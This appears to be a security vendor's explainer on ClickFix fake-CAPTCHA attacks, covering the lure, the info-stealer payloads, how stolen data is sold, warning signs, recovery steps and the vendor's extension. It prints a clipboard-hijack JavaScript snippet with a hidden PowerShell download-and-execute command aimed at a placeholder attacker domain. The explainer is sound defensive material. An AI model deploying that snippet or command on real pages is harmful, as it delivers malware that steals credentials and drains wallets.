The fake CAPTCHA that empties your wallet: ClickFix, explained

What ClickFix is

ClickFix is a social engineering kit that wears a CAPTCHA costume. You land on a page that looks like a normal "verify you're human" challenge. Cloudflare Turnstile logo, the familiar checkbox, maybe a progress bar. You click it. Instead of solving the CAPTCHA the page says verification failed and shows you three steps to "fix" it:

1. Press Win + R on your keyboard
2. Press Ctrl + V to paste
3. Press Enter

What the page does not tell you is that clicking the fake CAPTCHA button quietly copied a PowerShell command to your clipboard. The Run dialog opens. You paste. You hit Enter. Windows launches PowerShell, reaches out to an attacker controlled server, downloads a payload, and runs it under your user account. No prompt. No warning. No download. The whole attack takes about eight seconds from "verify you're human" to full system compromise.

The macOS variant uses Terminal instead of Run, and the Linux one uses xdotool style prompts, but the pattern is identical. A page you trust tricks you into executing code you did not write.

Why every antivirus misses it

Traditional endpoint protection looks for two things: known malware signatures and suspicious process behavior. ClickFix defeats both by design.

There is no malicious file on disk when the attack starts. The delivery payload lives in a string copied to your clipboard. The process that runs it is powershell.exe, a signed Microsoft binary that is on the allow list of every antivirus shipped in the last fifteen years. When PowerShell pulls the second stage, it often loads it directly into memory with Invoke-Expression or reflection.Assembly.Load, so the malware never touches the filesystem. Fileless loading means no file to scan.

The final nail is consent. The user typed the keystrokes. The user pasted the command. The user hit Enter. From the operating system's perspective, this is a legitimate administrator running a legitimate interpreter. There is no exploit, no privilege escalation, no CVE to patch. You cannot write a signature for "user followed instructions on a webpage." That is why ClickFix went from a research curiosity in 2024 to roughly 40 percent of all browser delivered malware incidents tracked in 2026.

The exact script kit

Most ClickFix landing pages are built from the same handful of templates, sold or leaked on Telegram and forum marketplaces. The structural pattern is predictable once you have seen one. The page loads a convincing CAPTCHA shell, then when the user clicks anywhere inside the challenge box, a small script fires:

const cmd = "powershell -w hidden -c \"iex (iwr 'https://[attacker-domain]/x.ps1')\"";
navigator.clipboard.writeText(cmd);

The navigator.clipboard.writeText() call is the entire trick. Browsers allow clipboard writes on user gesture without a permission prompt, which is fine for copy buttons on normal sites but perfect cover here. The moment the user clicks the fake CAPTCHA, their clipboard is overwritten.

A second layer fades in the "verification failed" panel after a short delay, usually between 600 and 1200 milliseconds. That delay is deliberate. It makes the failure feel like a real CAPTCHA timing out rather than an instant fake. The instructions panel then walks the user through Win+R, Ctrl+V, Enter, sometimes with a fake "robot ID" string like ray-id: 7a3f... appended to the command to make the pasted text look like diagnostic input rather than a shell command.

Variants swap powershell for mshta, curl | iex, or base64 encoded blobs. The base64 ones read as gibberish in the Run dialog, which actually helps the attacker because confused users are more likely to follow the "just hit Enter" instruction without reading.

Who's running these campaigns

ClickFix is not one group. It is a delivery mechanism used by dozens of affiliates feeding a handful of malware families. The traffic side runs through compromised WordPress sites, malvertising on ad networks with weak review, SEO poisoning on long tail crypto and software download queries, and increasingly through fake Google Meet and Zoom invite links.

Domain rotation is aggressive. A typical campaign burns through a fresh domain every 24 to 72 hours to stay ahead of blocklists. Domains are usually registered through resellers that accept crypto, hosted on bulletproof providers, and fronted by Cloudflare to hide the origin.

On the payload side, the most common families we see delivered by ClickFix pages are Vidar, RedLine, Lumma, StealC, and ACR Stealer. All of them are info-stealers. They are rented as a service, typically 150 to 500 USD per month per operator, which keeps the barrier to entry low. The same ClickFix page can deliver different payloads depending on geolocation, browser fingerprint, or which affiliate is running traffic that hour.

How the malware gets monetized

Once the PowerShell one-liner runs, the info-stealer does its work in under a minute. It targets a predictable list of high value data:

• Saved passwords from Chrome, Firefox, Edge, Brave, Opera, and every Chromium fork
• Session cookies, which are more valuable than passwords because they bypass two factor authentication
• Browser extension wallet storage: MetaMask, Phantom, Rabby, Rainbow, Keplr, and thirty plus others
• Desktop wallet files: Exodus, Electrum, Atomic, Ledger Live
• Discord, Telegram, and Steam session tokens
• Autofill data including credit cards and addresses
• Screenshots of the desktop at moment of infection

The stolen data is packaged into a "log" and uploaded to a command and control server. From there it hits one of three paths. Crypto wallets with balances are drained within minutes, usually by an automated draining bot that sweeps any hot wallet with seed phrases in plaintext extension storage. Session cookies for high value accounts like email, exchanges, and cloud providers are resold individually on markets like Russian Market or Genesis for anywhere from 5 to 500 USD each. The bulk logs, often containing credentials for hundreds of sites per victim, are sold in bundles to credential stuffing operators who test them against banking, streaming, and shopping sites for account takeover.

A single successful ClickFix infection on a crypto user is worth on average 2800 USD to the operator based on drain data we have tracked. On a non crypto user it is closer to 40 USD through credential resale. Both numbers are high enough to keep the attack profitable at scale.

The 4 signs you're looking at ClickFix right now

1. The CAPTCHA instructions involve Win+R, Terminal, or PowerShell. No legitimate CAPTCHA in the history of the internet has ever asked you to open a shell. Cloudflare, Google reCAPTCHA, hCaptcha, and Turnstile all work inside the page. If a human verification step tells you to press keyboard shortcuts that open system dialogs, close the tab.
2. The page says verification failed and asks you to run a script. Real CAPTCHAs fail silently or retry. They never hand you a command and say "paste this to prove you're human." That phrasing alone is a ClickFix tell.
3. The URL is a doppelganger of a legitimate service you don't actually use. Common ClickFix lures imitate Cloudflare challenge pages, Google Meet joins, Zoom updates, DocuSign verifications, and fake browser update prompts. If you arrived at a "Cloudflare challenge" without visiting a site that uses Cloudflare, something is wrong.
4. Your clipboard suddenly contains a shell command. If you ever land on a suspect page and want to check, open Notepad and paste. If what comes out starts with powershell, mshta, cmd /c, curl, or a long base64 string, you were targeted. Do not paste it anywhere else. Clear your clipboard and walk away.

What to do if you already ran it

Assume full compromise. Work through these seven steps in order, from a different device if possible.

1. Disconnect the infected machine from the internet. Unplug the ethernet cable or turn off Wi-Fi. This stops any active data exfiltration and cuts off the C2 channel before more damage is done.
2. Run a full scan with two engines. Malwarebytes plus Windows Defender offline scan is a good free combination. Info-stealers often ship with persistence that only a full boot time scan will catch.
3. Change every password you used in the last 24 hours. Start with your primary email, because whoever has that can reset everything else. Then banking, crypto exchanges, password manager master password, and any account with payment data. Use the clean device, not the infected one.
4. Revoke all active sessions. Most services have a "sign out all devices" option in security settings. Do this for Google, Apple, Microsoft, Discord, your password manager, and every exchange you use. Cookies stolen before you changed the password still work until sessions are killed.
5. Move any crypto to a fresh wallet. Generate a new seed on a clean device, ideally hardware if you have one available. Transfer funds out of any hot wallet that was on the compromised machine. Do not reuse the old seed, ever, even after a clean reinstall. Assume it is in a database on a stealer server.
6. Check bank and crypto transactions for the next 48 hours. Enable every fraud alert your bank offers. Watch on-chain addresses for unusual outflows. Contact your bank preemptively if you entered card details on the infected machine during that window.
7. Consider a full OS reinstall. If the compromised account has access to anything important, flatten the machine. A wiped and reinstalled OS is the only way to be certain no persistence remains. Back up documents to external media, scan them separately, and restore after the reinstall rather than using a system image.

For crypto specific recovery, see our step by step guide on what to do when your seed phrase has been stolen.

How SafeBrowz catches ClickFix specifically

We built three independent layers against this attack class because any single defense can be bypassed. All three run in the free extension, and one runs only in Premium.

Layer 1: Domain blocklist. Every known ClickFix delivery domain, staging server, and command and control endpoint we track is pushed to the extension on a six hour refresh cycle. The list is sourced from our own crawlers, partner threat feeds, and community submissions. If a page loads from a known bad domain, the request is blocked before the HTML ever renders. For context on how domain detection generally works, see our primer on how to tell if a website is a scam.

Layer 2: Content pattern detection. Blocklists lag fresh domains by hours or days. To catch pages we have never seen, the extension scans page content pre-render for ClickFix fingerprints: the Win+R instruction language in any of 100 plus supported languages, calls to navigator.clipboard.writeText inside click handlers, fake verification failed panels, and combinations of CAPTCHA branding with shell command text. AI content analysis runs on anything suspicious and flags it even when the page does not match a known template. This catches zero day ClickFix variants in the wild.

Layer 3: Clipboard hijack guard (Premium). The nuclear option. Any page that tries to write to the clipboard without a clearly intentional click on a visible copy button is blocked and the user is shown what the page tried to copy. This stops the entire attack chain at the exact moment the malicious command would hit your clipboard, regardless of domain reputation or content patterns.

The deeper technical breakdown of our ClickFix defenses lives on the ClickFix protection page.

Frequently asked questions

Does SafeBrowz work on Mac?

Yes. The extension blocks the ClickFix delivery site at the browser layer, which works the same on Mac, Windows, Linux, and ChromeOS. The malware payload happens to target Windows most often, but you are protected from landing on the page in the first place regardless of operating system.

Is the free tier enough?

For most users, yes. The blocklist and content pattern detection layers catch the vast majority of ClickFix pages and are free forever. The clipboard hijack guard in Premium is the last line of defense for users who want belt and suspenders protection, especially anyone holding meaningful crypto.

I visited a ClickFix page but didn't run anything. Am I safe?

Yes. Simply viewing the page does nothing. The attack requires you to press Win+R, paste, and press Enter. If you closed the tab without following the instructions, no code ran on your machine. Clear your clipboard to be tidy and move on.

How common is ClickFix compared to traditional phishing?

In 2026, roughly 40 percent of browser delivered malware incidents we track involve a ClickFix variant. Traditional credential phishing is still larger overall, but ClickFix is growing fastest because it defeats antivirus and two factor authentication simultaneously. Expect it to keep climbing.

Why don't browsers block this natively?

Because technically nothing in the browser is broken. The user clicked a button. The page wrote to the clipboard on a user gesture, which is allowed. The user then opened their own shell and pasted. From Chrome's perspective, every step is a legitimate action. Defense has to live one layer up, which is where a dedicated extension matters.